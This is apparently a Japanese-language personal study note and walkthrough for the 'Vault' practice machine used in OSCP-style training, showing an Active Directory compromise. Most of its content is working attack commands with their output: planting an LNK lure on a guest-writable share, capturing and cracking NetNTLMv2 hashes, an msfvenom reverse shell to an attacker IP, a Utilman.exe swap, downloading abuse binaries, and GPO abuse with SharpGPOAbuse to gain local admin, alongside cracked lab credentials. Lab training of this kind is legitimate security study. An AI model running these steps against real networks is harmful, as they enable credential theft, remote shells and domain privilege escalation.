LDAP 192.168.206.172 389 DC Storage Replica Administrators membercount: 0
LDAP 192.168.206.172 389 DC Domain Computers membercount: 0
LDAP 192.168.206.172 389 DC Domain Controllers membercount: 0
LDAP 192.168.206.172 389 DC Schema Admins membercount: 1
LDAP 192.168.206.172 389 DC Enterprise Admins membercount: 1
LDAP 192.168.206.172 389 DC Cert Publishers membercount: 0
LDAP 192.168.206.172 389 DC Domain Admins membercount: 1
LDAP 192.168.206.172 389 DC Domain Users membercount: 0
LDAP 192.168.206.172 389 DC Domain Guests membercount: 0
LDAP 192.168.206.172 389 DC Group Policy Creator Owners membercount: 1
LDAP 192.168.206.172 389 DC RAS and IAS Servers membercount: 0
LDAP 192.168.206.172 389 DC Server Operators membercount: 1
LDAP 192.168.206.172 389 DC Account Operators membercount: 0
LDAP 192.168.206.172 389 DC Pre-Windows 2000 Compatible Access membercount: 1
LDAP 192.168.206.172 389 DC Incoming Forest Trust Builders membercount: 0
LDAP 192.168.206.172 389 DC Windows Authorization Access Group membercount: 1
LDAP 192.168.206.172 389 DC Terminal Server License Servers membercount: 0
LDAP 192.168.206.172 389 DC Allowed RODC Password Replication Group membercount: 0
LDAP 192.168.206.172 389 DC Denied RODC Password Replication Group membercount: 8
LDAP 192.168.206.172 389 DC Read-only Domain Controllers membercount: 0
LDAP 192.168.206.172 389 DC Enterprise Read-only Domain Controllers membercount: 0
LDAP 192.168.206.172 389 DC Cloneable Domain Controllers membercount: 0
LDAP 192.168.206.172 389 DC Protected Users membercount: 0
LDAP 192.168.206.172 389 DC Key Admins membercount: 0
LDAP 192.168.206.172 389 DC Enterprise Key Admins membercount: 0
LDAP 192.168.206.172 389 DC DnsAdmins membercount: 0
LDAP 192.168.206.172 389 DC DnsUpdateProxy membercount: 0
┌──(kali@kali)-[~/oscp/pGpractice/Vault/192.168.206.172]
└─$ impacket-GetUserSPNs vault.offsec/ANIRUDH:"SecureHM" -dc-ip 192.168.206.172 -request -outputfile kerberoast.hash
Impacket v0.13.0.dev0 - Copyright Fortra, LLC and its affiliated companies
No entries found!
┌──(kali@kali)-[~/oscp/pGpractice/Vault/192.168.206.172]
└─$
C$に書き込み権限ある
SeRestorePrivilege で rdpが有効な場合
cd C:\Windows\system32
ren Utilman.exe Utilman.old
ren cmd.exe Utilman.exe
rdesktop 192.168.206.172
Winkey+U
⇒うまくいった
Winkey+Uのスクショ???
SeRestorePrivilege で rdpが無効な場合
SeRestoreAbuse.exe https://github.com/dxnboy/redteam/blob/master/SeRestoreAbuse.exe
wget -O SeRestoreAbuse.exe https://raw.githubusercontent.com/dxnboy/redteam/master/SeRestoreAbuse.exe
msfvenom -p windows/x64/shell_reverse_tcp LHOST=192.168.45.187 LPORT=443 -f exe -o rev.exe
rlwrap -cAr nc -lvnp 443
*Evil-WinRM* PS C:\temp> .\SeRestoreAbuse.exe .\rev.exe
RegCreateKeyExA result: 0
RegSetValueExA result: 0
*Evil-WinRM* PS C:\temp>
⇒リバースshell来なかった。 これはなぜうまくいかない???
次にbloodhound
┌──(kali@kali)-[~/oscp/pGpractice/Vault/192.168.206.172]
└─$ nxc ldap 192.168.206.172 -d vault.offsec -u ANIRUDH -p 'SecureHM' --bloodhound --collection All --dns-server 192.168.206.172
LDAP 192.168.206.172 389 DC [*] Windows 10 / Server 2019 Build 17763 (name:DC) (domain:vault.offsec)
LDAP 192.168.206.172 389 DC [+] vault.offsec\ANIRUDH:SecureHM (Pwn3d!)
LDAP 192.168.206.172 389 DC Resolved collection methods: acl, group, psremote, localadmin, objectprops, rdp, container, session, trusts, dcom
LDAP 192.168.206.172 389 DC Done in 00M 20S
LDAP 192.168.206.172 389 DC Compressing output into /home/kali/.nxc/logs/DC_192.168.206.172_2026-06-30_232120_bloodhound.zip
┌──(kali@kali)-[~/oscp/pGpractice/Vault/192.168.206.172]
bloodhound
http://127.0.0.1:8080/
bloodhoundのスクショ???
GPOオブジェクトに対して書き込み系権限がある
SharpGPOAbuse.exe
wget https://raw.githubusercontent.com/byronkg/SharpGPOAbuse/main/SharpGPOAbuse-master/SharpGPOAbuse.exe
upload SharpGPOAbuse.exe
net localgroup administrators
SharpGPOAbuse.exe --AddComputerTask --TaskName rev --Author test --Command C:\Windows\Temp\rev.exe --GPOName "Default Domain Policy"
.\SharpGPOAbuse.exe --AddLocalAdmin --UserAccount anirudh --GPOName " Default Domain Policy"
gpupdate /force
net localgroup administrators
*Evil-WinRM* PS C:\Users\anirudh\Documents> upload SharpGPOAbuse.exe
Info: Uploading /home/kali/oscp/pGpractice/Vault/192.168.206.172/SharpGPOAbuse.exe to C:\Users\anirudh\Documents\SharpGPOAbuse.exe
Info: Upload successful!
*Evil-WinRM* PS C:\Users\anirudh\Documents> net localgroup administrators
Alias name administrators
Comment Administrators have complete and unrestricted access to the computer/domain
Members
-------------------------------------------------------------------------------
Administrator
Domain Admins
Enterprise Admins
The command completed successfully.
*Evil-WinRM* PS C:\Users\anirudh\Documents> .\SharpGPOAbuse.exe --AddLocalAdmin --UserAccount anirudh --GPOName " Default Domain Policy"
[+] Domain = vault.offsec
[+] Domain Controller = DC.vault.offsec
[+] Distinguished Name = CN=Policies,CN=System,DC=vault,DC=offsec
[+] SID Value of anirudh = S-1-5-21-537427935-490066102-1511301751-1103
[+] GUID of " Default Domain Policy" is: {31B2F340-016D-11D2-945F-00C04FB984F9}
[+] File exists: \\vault.offsec\SysVol\vault.offsec\Policies\{31B2F340-016D-11D2-945F-00C04FB984F9}\Machine\Microsoft\Windows NT\SecEdit\GptTmpl.inf
[!] Group Memberships are already defined in the GPO. Use --force to make changes. This option might break the affected systems!
[-] Exiting...
*Evil-WinRM* PS C:\Users\anirudh\Documents> gpupdate /force
Updating policy...
Computer Policy update has completed successfully.
User Policy update has completed successfully.
*Evil-WinRM* PS C:\Users\anirudh\Documents> net localgroup administrators
Alias name administrators
Comment Administrators have complete and unrestricted access to the computer/domain
Members
-------------------------------------------------------------------------------
Administrator
anirudh
The command completed successfully.
*Evil-WinRM* PS C:\Users\anirudh\Documents>
flag検索
cmd /c "dir C:\Users\proof.txt /s /b"
cmd /c "dir C:\proof.txt /s /b"
gci C:\Users -Filter proof.txt -Recurse -Force -ea SilentlyContinue | select -ExpandProperty FullName
gci C:\ -Filter proof.txt -Recurse -Force -ea SilentlyContinue | select -ExpandProperty FullName
*Evil-WinRM* PS C:\Users\anirudh\Documents> cmd /c "dir C:\Users\proof.txt /s /b"
The term 'cmd' is not recognized as the name of a cmdlet, function, script file, or operable program. Check the spelling of the name, or if a path was included, verify that the path is correct and try again.
At line:1 char:1
+ cmd /c "dir C:\Users\proof.txt /s /b"
+ ~~~
+ CategoryInfo : ObjectNotFound: (cmd:String) [], CommandNotFoundException
+ FullyQualifiedErrorId : CommandNotFoundException
*Evil-WinRM* PS C:\Users\anirudh\Documents> gci C:\Users -Filter proof.txt -Recurse -Force -ea SilentlyContinue | select -ExpandProperty FullName
C:\Users\Administrator\Desktop\proof.txt
*Evil-WinRM* PS C:\Users\anirudh\Documents>
walkthrough(AI)¶
このAI版 walkthrough は、生メモを再現しやすく整理したもの。Vault は Guest で書ける SMB 共有に LNK lure を置き、NetNTLMv2 を捕獲して ANIRUDH の WinRM へ進み、GPO 書き込み権限で local admin を取る。
1. Guest SMB と writable share を確認¶
Guest ログインで SMB 共有を確認する。DocumentsShare に書き込み可能。
nxc smb 192.168.206.172 -u guest -p '' --shares
smbclient //192.168.206.172/DocumentsShare -U 'guest%'
2. ntlm_theft で LNK lure を作る¶
共有を誰かが開いたときに攻撃端末へ認証を飛ばすため、LNK ファイルを作る。
git clone https://github.com/Greenwolf/ntlm_theft.git
cd ntlm_theft
python3 ntlm_theft.py -g lnk -s 192.168.45.187 -f vault
DocumentsShare に配置する。
smbclient //192.168.206.172/DocumentsShare -U 'guest%'
put vault/vault.lnk
3. Responder で NetNTLMv2 を捕獲して crack¶
Responder で待ち受けると、ANIRUDH の NetNTLMv2 hash が取れる。
sudo responder -I tun0 -v
hash を crack する。
hashcat -m 5600 anirudh.hash /usr/share/wordlists/rockyou.txt
john anirudh.hash --wordlist=/usr/share/wordlists/rockyou.txt
得られる資格情報。
ANIRUDH / SecureHM
4. ANIRUDH で WinRM¶
取得した資格情報を各サービスに試し、WinRM する。
for p in smb rdp winrm; do nxc $p 192.168.206.172 -u anirudh -p 'SecureHM'; done
evil-winrm -i 192.168.206.172 -u ANIRUDH -p 'SecureHM'
5. BloodHound で GPO write path を確認¶
ANIRUDH の権限で BloodHound データを取得する。
nxc ldap 192.168.206.172 -d vault.offsec -u ANIRUDH -p 'SecureHM' --bloodhound --collection All --dns-server 192.168.206.172
BloodHound で GPO への書き込みパスを確認する。ここでは Default Domain Policy を悪用して、ANIRUDH を local Administrators に追加する。
6. SharpGPOAbuse で local admin を付与¶
SharpGPOAbuse を準備してアップロードする。
wget https://raw.githubusercontent.com/byronkg/SharpGPOAbuse/main/SharpGPOAbuse-master/SharpGPOAbuse.exe
upload SharpGPOAbuse.exe
net localgroup administrators
.\SharpGPOAbuse.exe --AddLocalAdmin --UserAccount anirudh --GPOName " Default Domain Policy"
gpupdate /force
net localgroup administrators
GPO 適用後、ANIRUDH が local Administrators に入る。
7. proof を取得¶
Administrator の proof を探して読む。
gci C:\Users -Filter proof.txt -Recurse -Force -ea SilentlyContinue | select -ExpandProperty FullName
type C:\Users\Administrator\Desktop\proof.txt
8. 攻撃の流れまとめ¶
Guest SMB login
→ writable DocumentsShare
→ ntlm_theft LNK lure
→ ANIRUDH NetNTLMv2 捕獲
→ hash crack: SecureHM
→ WinRM as ANIRUDH
→ BloodHound で GPO write path
→ SharpGPOAbuse で local Administrators 追加
→ gpupdate
→ Administrator proof.txt
drill¶
Guest SMBとwritable share確認¶
nxc smb 192.168.206.172 -u guest -p '' --shares
smbclient //192.168.206.172/DocumentsShare -U 'guest%'
ntlm_theftでLNK作成・配置¶
git clone https://github.com/Greenwolf/ntlm_theft.git
cd ntlm_theft
python3 ntlm_theft.py -g lnk -s 192.168.45.187 -f vault
smbclient //192.168.206.172/DocumentsShare -U 'guest%'
put vault/vault.lnk
NetNTLMv2捕獲とクラック¶
sudo responder -I tun0 -v
hashcat -m 5600 anirudh.hash /usr/share/wordlists/rockyou.txt
john anirudh.hash --wordlist=/usr/share/wordlists/rockyou.txt
ANIRUDHでWinRM¶
for p in smb rdp winrm; do nxc $p 192.168.206.172 -u anirudh -p 'SecureHM'; done
evil-winrm -i 192.168.206.172 -u ANIRUDH -p 'SecureHM'
BloodHoundとGPO abuse¶
nxc ldap 192.168.206.172 -d vault.offsec -u ANIRUDH -p 'SecureHM' --bloodhound --collection All --dns-server 192.168.206.172
wget https://raw.githubusercontent.com/byronkg/SharpGPOAbuse/main/SharpGPOAbuse-master/SharpGPOAbuse.exe
upload SharpGPOAbuse.exe
net localgroup administrators
.\SharpGPOAbuse.exe --AddLocalAdmin --UserAccount anirudh --GPOName " Default Domain Policy"
gpupdate /force
net localgroup administrators
proof取得¶
gci C:\Users -Filter proof.txt -Recurse -Force -ea SilentlyContinue | select -ExpandProperty FullName
type C:\Users\Administrator\Desktop\proof.txt